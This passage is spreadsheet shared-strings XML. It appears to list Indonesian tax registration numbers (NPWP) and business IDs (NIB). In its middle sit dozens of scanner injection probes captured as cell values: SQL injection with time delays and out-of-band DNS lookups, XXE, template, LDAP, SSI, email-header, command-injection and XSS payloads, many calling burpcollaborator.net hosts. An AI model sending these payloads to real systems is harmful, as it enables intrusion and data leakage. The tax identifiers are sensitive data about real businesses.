    <t>15‚Äì871‚Äì007‚Äì9‚Äì334‚Äì000</t>
  </si>
  <si>
    <t>87‚Äì343‚Äì271‚Äì0‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì601‚Äì784‚Äì6‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>87‚Äì011‚Äì674‚Äì6‚Äì201‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì228‚Äì598‚Äì8‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì617‚Äì229‚Äì1‚Äì201‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì623‚Äì880‚Äì9‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì587‚Äì023‚Äì2‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì495‚Äì569‚Äì6‚Äì832‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì203‚Äì433‚Äì7‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì147‚Äì636‚Äì4‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì276‚Äì406‚Äì2‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì421‚Äì488‚Äì7‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì843‚Äì627‚Äì1‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì193‚Äì087‚Äì0‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì638‚Äì777‚Äì9‚Äì955‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì180‚Äì179‚Äì0‚Äì125‚Äì001</t>
  </si>
  <si>
    <t>75‚Äì124‚Äì598‚Äì6‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì798‚Äì618‚Äì1‚Äì913‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì310‚Äì079‚Äì5‚Äì301‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì691‚Äì773‚Äì9‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì516‚Äì648‚Äì1‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì494‚Äì769‚Äì5‚Äì501‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì060‚Äì625‚Äì5‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì923‚Äì378‚Äì2‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì127‚Äì845‚Äì7‚Äì626‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì509‚Äì739‚Äì5‚Äì814‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì513‚Äì100‚Äì3‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì422‚Äì908‚Äì1‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì639‚Äì494‚Äì5‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì182‚Äì366‚Äì9‚Äì516‚Äì001</t>
  </si>
  <si>
    <t>86‚Äì526‚Äì480‚Äì8‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì631‚Äì479‚Äì9‚Äì105‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì795‚Äì014‚Äì7‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì985‚Äì251‚Äì9‚Äì624‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì532‚Äì859‚Äì4‚Äì615‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì823‚Äì569‚Äì5‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì978‚Äì460‚Äì5‚Äì404‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì502‚Äì310‚Äì8‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì889‚Äì368‚Äì5‚Äì418‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì919‚Äì954‚Äì4‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì081‚Äì949‚Äì6‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì776‚Äì232‚Äì9‚Äì038‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì551‚Äì444‚Äì5‚Äì043‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì119‚Äì848‚Äì6‚Äì832‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì602‚Äì818‚Äì6‚Äì071‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì968‚Äì425‚Äì1‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì734‚Äì404‚Äì7‚Äì616‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì672‚Äì884‚Äì1‚Äì334‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì797‚Äì243‚Äì0‚Äì306‚Äì000</t>
  </si>
  <si>
    <t>93.123.861.2-214.000</t>
  </si>
  <si>
    <t>01‚Äì070‚Äì707‚Äì3‚Äì624‚Äì001</t>
  </si>
  <si>
    <t>93‚Äì213‚Äì549‚Äì4‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì785‚Äì332‚Äì0‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì609‚Äì968‚Äì6‚Äì619‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì025‚Äì071‚Äì9‚Äì517‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì249‚Äì374‚Äì0‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì257‚Äì410‚Äì7‚Äì631‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì813‚Äì489‚Äì9‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì001‚Äì723‚Äì4‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì463‚Äì367‚Äì0‚Äì808‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì206‚Äì559‚Äì3‚Äì105‚Äì000</t>
  </si>
  <si>
    <t>93‚Äì228‚Äì373‚Äì2‚Äì921‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì223‚Äì331‚Äì8‚Äì123‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì970‚Äì000‚Äì3‚Äì201‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì565‚Äì301‚Äì7‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>36‚Äì528‚Äì089‚Äì0‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>93‚Äì336‚Äì128‚Äì9‚Äì404‚Äì000</t>
  </si>
  <si>
    <t>93‚Äì185‚Äì868‚Äì2‚Äì806‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì853‚Äì573‚Äì0‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì342‚Äì733‚Äì9‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì065‚Äì1‚Äì951‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì426‚Äì001</t>
  </si>
  <si>
    <t>91‚Äì531‚Äì882‚Äì8‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì126‚Äì207‚Äì4‚Äì722‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì060‚Äì103‚Äì4‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì438‚Äì410‚Äì9‚Äì403‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì470‚Äì894‚Äì4‚Äì611‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì047‚Äì759‚Äì5‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì472‚Äì557‚Äì9‚Äì307‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì124‚Äì890‚Äì0‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>93‚Äì032‚Äì375‚Äì3‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì464‚Äì032‚Äì1‚Äì922‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì365‚Äì443‚Äì7‚Äì212‚Äì000</t>
  </si>
  <si>
    <t>65‚Äì129‚Äì315‚Äì9‚Äì315‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì686‚Äì892‚Äì1‚Äì028‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì032‚Äì698‚Äì9‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>25‚Äì014‚Äì484‚Äì7‚Äì005‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì277‚Äì658‚Äì5‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì591‚Äì864‚Äì4‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì209‚Äì191‚Äì0‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì778‚Äì701‚Äì0‚Äì013‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì001‚Äì439‚Äì6‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì066‚Äì715‚Äì1‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì027‚Äì065‚Äì8‚Äì102‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì495‚Äì075‚Äì4‚Äì414‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì357‚Äì842‚Äì4‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì643‚Äì034‚Äì3‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì441‚Äì371‚Äì5‚Äì301‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì343‚Äì583‚Äì7‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì293‚Äì483‚Äì0‚Äì223‚Äì001</t>
  </si>
  <si>
    <t>93‚Äì205‚Äì718‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì079‚Äì872‚Äì2‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì507‚Äì001</t>
  </si>
  <si>
    <t>83‚Äì339‚Äì746‚Äì6‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì104‚Äì778‚Äì6‚Äì541‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì838‚Äì859‚Äì8‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>93‚Äì073‚Äì981‚Äì8‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì272‚Äì023‚Äì2‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>83.363.982.6-643.000</t>
  </si>
  <si>
    <t>01.696.446.2-941.001</t>
  </si>
  <si>
    <t>92.387.529.8-617.000</t>
  </si>
  <si>
    <t>01.083.278.0-651.000</t>
  </si>
  <si>
    <t>74.719.423.1-507.000</t>
  </si>
  <si>
    <t>06.702.366.3-124.000</t>
  </si>
  <si>
    <t>92.613.395.0-255.000</t>
  </si>
  <si>
    <t>NIB_8120102941602</t>
  </si>
  <si>
    <t>01.870.966.7-022.000</t>
  </si>
  <si>
    <t>02.299.326.5-518.000</t>
  </si>
  <si>
    <t>03.280.990.7-041.000</t>
  </si>
  <si>
    <t>02.189.571.9-037.000</t>
  </si>
  <si>
    <t>02.938.305.6-603.000</t>
  </si>
  <si>
    <t>02.009.744.0-604.000</t>
  </si>
  <si>
    <t>83.945.370.1-041.000</t>
  </si>
  <si>
    <t>91.824.935.0-047.000</t>
  </si>
  <si>
    <t>91.282.337.4-831.000</t>
  </si>
  <si>
    <t>01.721.208.5-041.000</t>
  </si>
  <si>
    <t>84.168.455.8-604.000</t>
  </si>
  <si>
    <t>02.830.829.4-041.000</t>
  </si>
  <si>
    <t>86.338.885.6-643.000</t>
  </si>
  <si>
    <t>Nomor Pokok Wajib Pajak</t>
  </si>
  <si>
    <t>70.720.720.5-047.000</t>
  </si>
  <si>
    <t>71.585.177.0.805.000</t>
  </si>
  <si>
    <t>P.1.0000552.17.04</t>
  </si>
  <si>
    <t>72.335.782.8-805.000</t>
  </si>
  <si>
    <t>80.989.346.4-447.000</t>
  </si>
  <si>
    <t>86.595.473.9-411.000</t>
  </si>
  <si>
    <t>01.762.100.4-215.000</t>
  </si>
  <si>
    <t>01.100.476.9-041.001</t>
  </si>
  <si>
    <t>91.381.946.2-047.000</t>
  </si>
  <si>
    <t>06.089.677.6-119.000</t>
  </si>
  <si>
    <t>94.218.261.9-544.000</t>
  </si>
  <si>
    <t>44.716.892.3-545.000</t>
  </si>
  <si>
    <t>24.272.152.0-115.000</t>
  </si>
  <si>
    <t>30.061.46.07794</t>
  </si>
  <si>
    <t>21.068.377.7-041.000</t>
  </si>
  <si>
    <t>81.107.406.1-627.000</t>
  </si>
  <si>
    <t>07.123.144.3-713.001</t>
  </si>
  <si>
    <t>01.519.308.9-324.000</t>
  </si>
  <si>
    <t>01.535.215.6-507.001</t>
  </si>
  <si>
    <t>93.253.932.3-306.000</t>
  </si>
  <si>
    <t>03.060.774.1-112.000</t>
  </si>
  <si>
    <t>01.984.622.9-041.000</t>
  </si>
  <si>
    <t>80.634.541.9-723.000</t>
  </si>
  <si>
    <t>92.051.307.4-801.000</t>
  </si>
  <si>
    <t>86.030.191.0-036.000</t>
  </si>
  <si>
    <t>70.895.222.1-543.000</t>
  </si>
  <si>
    <t>80.457.569.4-124.000</t>
  </si>
  <si>
    <t>82.113.724.7-809.001</t>
  </si>
  <si>
    <t>92.809.986.0-804.000</t>
  </si>
  <si>
    <t>No NIB 9120317041501</t>
  </si>
  <si>
    <t>21.038.082.0-503.000</t>
  </si>
  <si>
    <t>76.040.337.8-822.000</t>
  </si>
  <si>
    <t>NO NPWP 92.778.701.0-013.000</t>
  </si>
  <si>
    <t>01.510.676.8-641.000</t>
  </si>
  <si>
    <t>02.208.003.0-615.000</t>
  </si>
  <si>
    <t>92.618.612.3-612.000</t>
  </si>
  <si>
    <t>01.923.391.5-821.000</t>
  </si>
  <si>
    <t>84.673.014.1-627.000</t>
  </si>
  <si>
    <t>IUMK/471/CA/XI/2018</t>
  </si>
  <si>
    <t>94.371.554.0-915.000</t>
  </si>
  <si>
    <t>80.437.487.4-435.000</t>
  </si>
  <si>
    <t>NPWP : 784882474-942000</t>
  </si>
  <si>
    <t>81.035.551.1-702.000</t>
  </si>
  <si>
    <t>35.522.529.3-629.000</t>
  </si>
  <si>
    <t>02.667.537.1-033.000</t>
  </si>
  <si>
    <t>84.436.106.3-617.001</t>
  </si>
  <si>
    <t>03.022.357.2-0.24.000</t>
  </si>
  <si>
    <t>83.878.322.3-034.000</t>
  </si>
  <si>
    <t>93.549.437.7-823.000</t>
  </si>
  <si>
    <t>31.218.606.7-903.000</t>
  </si>
  <si>
    <t>85.322.449.1449.1-915.000</t>
  </si>
  <si>
    <t>NPWP PT. SSLI</t>
  </si>
  <si>
    <t>02.926.684.8-926.000</t>
  </si>
  <si>
    <t>76.453.907.8-922.000</t>
  </si>
  <si>
    <t>74.555.224.0-942.000</t>
  </si>
  <si>
    <t>01.461.896.1.312.000</t>
  </si>
  <si>
    <t>01.454.019.9-801.001</t>
  </si>
  <si>
    <t>01.360.591.0-007.000</t>
  </si>
  <si>
    <t>14.675.337.1-214.000</t>
  </si>
  <si>
    <t>03.234.880.7-022.000</t>
  </si>
  <si>
    <t>94.703.405.4-604.000</t>
  </si>
  <si>
    <t>80.442.749.0-905.000</t>
  </si>
  <si>
    <t>94.013.156.8-627.000</t>
  </si>
  <si>
    <t>76.282.196.5-216.000</t>
  </si>
  <si>
    <t>(select extractvalue(xmltype('&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;&amp;lt;!DOCTYPE root [ &amp;lt;!ENTITY % gyrlb SYSTEM "http://aft0axd7ef8b5iny8un8hq4gq7w5kv8ywqjo7d.burpcollab'||'orator.net/"&gt;%gyrlb;]&gt;'),'/l') from dual)</t>
  </si>
  <si>
    <t>1234'||(select extractvalue(xmltype('&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;&amp;lt;!DOCTYPE root [ &amp;lt;!ENTITY % gyrlb SYSTEM "http://0efq9ncxd57148mo7kmygg36pxvvjl7pvhif64.burpcollab'||'orator.net/"&gt;%gyrlb;]&gt;'),'/l') from dual)||'</t>
  </si>
  <si>
    <t xml:space="preserve">1234;declare @q varchar(99);set @q='\\\\c1e2wzz90hudrk90uw9a3sqic9i76xuokcczanz.burpcollab'+'orator.net\lig'; exec master.dbo.xp_dirtree @q;-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234';declare @q varchar(99);set @q='\\\\yuwoplsvt3nzk62mni2wwej45vbtzjnaey6l49t.burpcollab'+'orator.net\yxd'; exec master.dbo.xp_dirtree @q;-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234);declare @q varchar(99);set @q='\\\\7ltxguj4kce8bftvert5nnadw422qsej67yuwil.burpcollab'+'orator.net\kib'; exec master.dbo.xp_dirtree @q;-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234');declare @q varchar(99);set @q='\\\\4otujrm1n9h5ecwshow2qkdaz15ztphga42r0fp.burpcollab'+'orator.net\iyq'; exec master.dbo.xp_dirtree @q;-- </t>
  </si>
  <si>
    <t>(select load_file&amp;#40;'\\\\2svsnpqzr7l3ia0qlm00uih83z9xxnlen2fpdd2.burpcollaborator.net\\che'&amp;#41;)</t>
  </si>
  <si>
    <t>1234'+(select load_file&amp;#40;'\\\\f1h5w2zc0kugrn93uz9d3vqlccia60urxfp2nqc.burpcollaborator.net\\soo'&amp;#41;)+'</t>
  </si>
  <si>
    <t>1234'</t>
  </si>
  <si>
    <t>1234''</t>
  </si>
  <si>
    <t>(select*from(select(sleep(20)))a)</t>
  </si>
  <si>
    <t>1234+(select*from(select(sleep(20)))a)+</t>
  </si>
  <si>
    <t xml:space="preserve">1234 and (select*from(select(sleep(20)))a)-- </t>
  </si>
  <si>
    <t>1234 waitfor delay'0:0:20'--</t>
  </si>
  <si>
    <t>1234)waitfor delay'0:0:20'--</t>
  </si>
  <si>
    <t>1234,0)waitfor delay'0:0:20'--</t>
  </si>
  <si>
    <t>123437996681 or 4089=04089</t>
  </si>
  <si>
    <t>123422282077 or 8041=8047</t>
  </si>
  <si>
    <t>123415849775 or 5569=5569</t>
  </si>
  <si>
    <t>123431510365 or 8197=81970</t>
  </si>
  <si>
    <t xml:space="preserve">123447431494 or 6256=06256-- </t>
  </si>
  <si>
    <t xml:space="preserve">123499251105 or 8173=8177-- </t>
  </si>
  <si>
    <t xml:space="preserve">123445327420 or 8894=8894-- </t>
  </si>
  <si>
    <t xml:space="preserve">123422147480 or 7147=71470-- </t>
  </si>
  <si>
    <t>1234 and 7396=07396</t>
  </si>
  <si>
    <t>1234 and 3281=3289</t>
  </si>
  <si>
    <t>1234 and 2531=2531</t>
  </si>
  <si>
    <t>1234 and 3570=35700</t>
  </si>
  <si>
    <t xml:space="preserve">1234 and 5281=05281-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234 and 9493=9495-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234 and 4296=4296-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234 and 6299=62990-- </t>
  </si>
  <si>
    <t>123476474355' or '5298'='5298</t>
  </si>
  <si>
    <t>123445741811' or '3545'='3550</t>
  </si>
  <si>
    <t>123423036036' or '5824'='5824</t>
  </si>
  <si>
    <t>123421484355' or '1587'='1587'</t>
  </si>
  <si>
    <t xml:space="preserve">123478060984' or 5729=5729-- </t>
  </si>
  <si>
    <t xml:space="preserve">123499495391' or 9273=9280-- </t>
  </si>
  <si>
    <t xml:space="preserve">123485396650' or 4001=4001-- </t>
  </si>
  <si>
    <t xml:space="preserve">123468452045' or 5600=5600'-- </t>
  </si>
  <si>
    <t>1234' and '6195'='6195</t>
  </si>
  <si>
    <t>1234' and '3217'='3225</t>
  </si>
  <si>
    <t>1234' and '8230'='8230</t>
  </si>
  <si>
    <t>1234' and '3990'='3990'</t>
  </si>
  <si>
    <t xml:space="preserve">1234' and 9937=9937-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234' and 6972=6974-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234' and 3920=3920-- </t>
  </si>
  <si>
    <t xml:space="preserve">1234' and 1112=1112'-- </t>
  </si>
  <si>
    <t>1234"</t>
  </si>
  <si>
    <t>m9p7trt077</t>
  </si>
  <si>
    <t>1234hv3cgodvx5</t>
  </si>
  <si>
    <t>o26h7${391*348}iyu1d</t>
  </si>
  <si>
    <t>xqwys{{302*921}}m0nzw</t>
  </si>
  <si>
    <t>1234}}cqatx'/"&amp;lt;pdqvg</t>
  </si>
  <si>
    <t>1234%}n420h'/"&amp;lt;n6ahq</t>
  </si>
  <si>
    <t>1234l4rav%&gt;sh3et'/"&amp;lt;wojh5</t>
  </si>
  <si>
    <t>eval&amp;#40;compile('for x in range(1&amp;#41;:\n import time\n time.sleep(20)','a','single'))</t>
  </si>
  <si>
    <t>wttmojrts1mxj41kmg1uvci24taryhm9a1xzlo.burpcollaborator.net</t>
  </si>
  <si>
    <t>http://l7tb285i6q0mxtf905fj91wriiogc60woobmzb.burpcollaborator.net/?1234</t>
  </si>
  <si>
    <t>3x4v7t33rn)(objectClass=*</t>
  </si>
  <si>
    <t>jfskniakvh)(!(objectClass=*)</t>
  </si>
  <si>
    <t>*)(objectClass=*</t>
  </si>
  <si>
    <t>*)(!(objectClass=*)</t>
  </si>
  <si>
    <t>&lt;rzq xss=removed xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://378t2q506804xbfr0nf19jw9i0oyco0oogbez3.burpcollaborator.net/rzq.xsd"&gt;rzq&lt;/rzq&gt;</t>
  </si>
  <si>
    <t>&lt;upi xmlns:xi="http://www.w3.org/2001/XInclude"&gt;&lt;xi href="http://bn21iyl8mggcdjvzgvv9prchy846swgx4prnfc.burpcollaborator.net/foo"&gt;&lt;/upi&gt;</t>
  </si>
  <si>
    <t>1234]]&gt;&gt;&lt;</t>
  </si>
  <si>
    <t>(function(){if(typeof l5zot==='undefined'){var a=new Date();do{var b=new Date();}while(b-a&amp;lt;20000);l5zot=1;}}())</t>
  </si>
  <si>
    <t>1234'+(function(){if(typeof ll3if==="undefined"){var a=new Date();do{var b=new Date();}while(b-a&amp;lt;20000);ll3if=1;}}())+'</t>
  </si>
  <si>
    <t>"--&amp;gt;'--&amp;gt;`--&amp;gt;&amp;lt;!--#set var="fgf" value="efe4a1dbej"--&amp;gt;&amp;lt;!--#set var="hih" value="ghg6c3fdgl"--&amp;gt;&amp;lt;!--#echo var="fgf"--&amp;gt;&amp;lt;!--#echo var="hih"--&amp;gt;&amp;lt;!--#exec cmd="nslookup -q=cname 121rxo0y16v2s9apvlaz4hr7dyjw7mvet2lpjd8.burpcollab</t>
  </si>
  <si>
    <t>BCC:k2nax70h1pvlssa8v4ai40rqdhjf75vxolg8ew3@burpcollaborator.net</t>
  </si>
  <si>
    <t>tsf: w"</t>
  </si>
  <si>
    <t>1234&gt;</t>
  </si>
  <si>
    <t>BCC:n9xd4a7k8s2ozvhb27hlb3ytkkqie820woobmzb@burpcollaborator.net</t>
  </si>
  <si>
    <t>fhg: o"</t>
  </si>
  <si>
    <t>nslookup -q=cname zuxppmswt4n0k72nnj2xwfj55wbuzkndq1iogc5.burpcollaborator.net.&amp;</t>
  </si>
  <si>
    <t>1234|nslookup -q=cname p5vf0c3m4uyqvxddy9dn75uvgmmkaay6my9wxl.burpcollaborator.net.&amp;</t>
  </si>
  <si>
    <t>1234'"`0&amp;nslookup -q=cname m1ocw9zj0runru9au69k32qscjih67u4iw5utj.burpcollaborator.net.&amp;`'</t>
  </si>
  <si>
    <t>1234&amp;nslookup -q=cname ivh8q5tfunojlq36o23gxyko6fcd03oycqzond.burpcollaborator.net.&amp;'\"`0&amp;nslookup -q=cname ivh8q5tfunojlq36o23gxyko6fcd03oycqzond.burpcollaborator.net.&amp;`'</t>
  </si>
  <si>
    <t>1234|echo n9i9davl8b ctv18mbx4a||a #' |echo n9i9davl8b ctv18mbx4a||a #|" |echo n9i9davl8b ctv18mbx4a||a #</t>
  </si>
  <si>
    <t>1234&amp;echo u05imk62nv fd72rxy1bv&amp;</t>
  </si>
  <si>
    <t>1234"|echo 2n3si8kn4m h6fxj430s2 ||</t>
  </si>
  <si>
    <t>1234'|echo 0he76dp7d8 7zk8hi3igz #xzwx</t>
  </si>
  <si>
    <t>l5rb083i4qymvtd9y5dj71urgimga6yyqmi9gx5</t>
  </si>
  <si>
    <t>'"&gt;&amp;lt;svg/onload=fetch`//8y7ytvw5xdr9og6wrs660one95f33trlh99w7kw\.burpcollaborator.net`&amp;gt;</t>
  </si>
  <si>
    <t>[removed]/*[removed]&lt;img xss=removed&gt;</t>
  </si>
  <si>
    <t>84.743.114.5-832.000</t>
  </si>
  <si>
    <t>90.722.802.7-642.000</t>
  </si>
  <si>
    <t>81.402.152.3-215.000</t>
  </si>
  <si>
    <t>01.221.074.6-402.000</t>
  </si>
  <si>
    <t>93.974.594.9-543.000</t>
  </si>
  <si>
    <t>14.321.499.7-214.000</t>
  </si>
  <si>
    <t>01.393.081.3-044.000</t>
  </si>
  <si>
    <t>81.104.778.6-541.000</t>
  </si>
  <si>
    <t>01.000.065.1-613.001</t>
  </si>
  <si>
    <t>94.498.629.8-213.000</t>
  </si>
  <si>
    <t>03.323.599.5-112.000</t>
  </si>
  <si>
    <t>01.569.027.4-062.000</t>
  </si>
  <si>
    <t>94.006.466.0-522.000</t>
  </si>
  <si>
    <t>82.047.663.8-113.000</t>
  </si>
  <si>
    <t>01.343.593.8.046.000</t>
  </si>
  <si>
    <t>02.682.022.5-047.000</t>
  </si>
  <si>
    <t>01.412.488.7-812.000</t>
  </si>
  <si>
    <t>01.920.207.6-003.000</t>
  </si>
  <si>
    <t>70.039.424.0-801.001</t>
  </si>
  <si>
    <t>46.199.916.1-542.000</t>
  </si>
  <si>
    <t>02.212.000.0-629.000</t>
  </si>
  <si>
    <t>NIB : 0294001931401</t>
  </si>
  <si>
    <t>76.674.712.5-448.000</t>
  </si>
  <si>
    <t>85.652.772.6-617.000</t>
  </si>
  <si>
    <t>95.014.394.1-922.000</t>
  </si>
  <si>
    <t>82.897.815.5-608.000</t>
  </si>
  <si>
    <t>68.214.591.7-542.000</t>
  </si>
  <si>
    <t>01.327.446.9.009.000</t>
  </si>
  <si>
    <t>01.718.122.3-415.000</t>
  </si>
  <si>
    <t>90.051.402.7-507.000</t>
  </si>
  <si>
    <t>NIB</t>
  </si>
  <si>
    <t>NPWP</t>
  </si>
  <si>
    <t>71.964.479.1-101.000</t>
  </si>
  <si>
    <t>01.317.659.9-026.000</t>
  </si>
  <si>
    <t>NPWP PT. Singgasana Unagi Indonesia</t>
  </si>
  <si>
    <t>36.562.823.9-516.000</t>
  </si>
  <si>
    <t>02.550.439.0-943.000</t>
  </si>
  <si>
    <t>01.000.065.1-942.002</t>
  </si>
  <si>
    <t>06.319.742.0-214.000</t>
  </si>
  <si>
    <t>55.139.853.0-202.000</t>
  </si>
  <si>
    <t>02.079.603.3-903.000</t>
  </si>
  <si>
    <t>14.742.543.3-701-000</t>
  </si>
  <si>
    <t>94.684.286.1-008.000</t>
  </si>
  <si>
    <t>81.711.293.1-805.000</t>
  </si>
  <si>
    <t>06529-02/PK/1.824.271</t>
  </si>
  <si>
    <t>86.470.202.2-807.000</t>
  </si>
  <si>
    <t>95.769.679.2-113.000</t>
  </si>
  <si>
    <t>01.871.297.6-507.001</t>
  </si>
  <si>
    <t>85.830.919.8-811.000</t>
  </si>
  <si>
    <t>83.040.067.7-724.000</t>
  </si>
  <si>
    <t>02.743.361.4-922.000</t>
  </si>
  <si>
    <t>8120014-151382</t>
  </si>
  <si>
    <t>NPWP HARTONO</t>
  </si>
  <si>
    <t>01.002.749.8-811.001</t>
  </si>
  <si>
    <t>70.641.535.3-811.000</t>
  </si>
  <si>
    <t>90.549.032.2-627.000</t>
  </si>
  <si>
    <t>93.222.511.3-911.000</t>
  </si>
  <si>
    <t>47.172.217.3-125.000</t>
  </si>
  <si>
    <t>82.405.094.2-432.000</t>
  </si>
  <si>
    <t>01.454.019-654.002</t>
  </si>
  <si>
    <t>01.061.076.4-093.000</t>
  </si>
  <si>
    <t>73.137.979.8-814.000</t>
  </si>
  <si>
    <t>NPNW Perorangan</t>
  </si>
  <si>
    <t>76.680.391.0-724.000</t>
  </si>
  <si>
    <t>80.382.740.1-223.000</t>
  </si>
  <si>
    <t>94.685.354.6-112.000</t>
  </si>
  <si>
    <t>91.490.015.4-704.000</t>
  </si>
  <si>
    <t>95.227.250.8-041.000</t>
  </si>
  <si>
    <t>71.605.591.8-805.000</t>
  </si>
  <si>
    <t xml:space="preserve"> 95.766.100.2-047.000 </t>
  </si>
  <si>
    <t>93.663.367.6-732.000</t>
  </si>
  <si>
    <t>74.623.117.4-804.000</t>
  </si>
  <si>
    <t>01.324.123.7-038.000</t>
  </si>
  <si>
    <t>21.118.829.7-047.000</t>
  </si>
  <si>
    <t>02.670.951.9-603.000</t>
  </si>
  <si>
    <t>02.379.509.9-041.000</t>
  </si>
  <si>
    <t>25.768.366.5/435.000</t>
  </si>
  <si>
    <t>48.221.001.0-545.000</t>
  </si>
  <si>
    <t>72.108.835.9-822.000</t>
  </si>
  <si>
    <t>96.013.301.5-041.000</t>
  </si>
  <si>
    <t>94.062.219.4-009.000</t>
  </si>
  <si>
    <t>95.716.403.1-801.000</t>
  </si>
  <si>
    <t>24.625.974.1-503.000</t>
  </si>
  <si>
    <t>82.037.364.5-416.000</t>
  </si>
  <si>
    <t>02 981.487.8-214.000</t>
  </si>
  <si>
    <t>ADA</t>
  </si>
  <si>
